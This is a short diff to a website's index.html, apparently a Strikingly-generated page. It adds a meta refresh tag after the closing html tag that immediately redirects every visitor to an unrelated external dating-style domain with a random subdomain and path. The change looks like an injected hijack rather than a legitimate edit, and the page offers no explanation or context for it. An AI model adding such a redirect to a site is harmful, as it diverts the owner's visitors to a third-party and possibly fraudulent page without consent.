--- a/index.html
+++ b/index.html
@@ -566,4 +566,7 @@ if (typeof getCookieItem === 'function' && !isDedicatedLandingPage && (getCookie
 </script>
 </body>
 </html>
+<meta http-equiv="refresh" content="0;url=https://y57phr8.reachlove-matcher.com/rc62qmx">
+
+
 <!-- Powered by Strikingly.com 4 (1) Dec 31, 2025 at 15:37-->
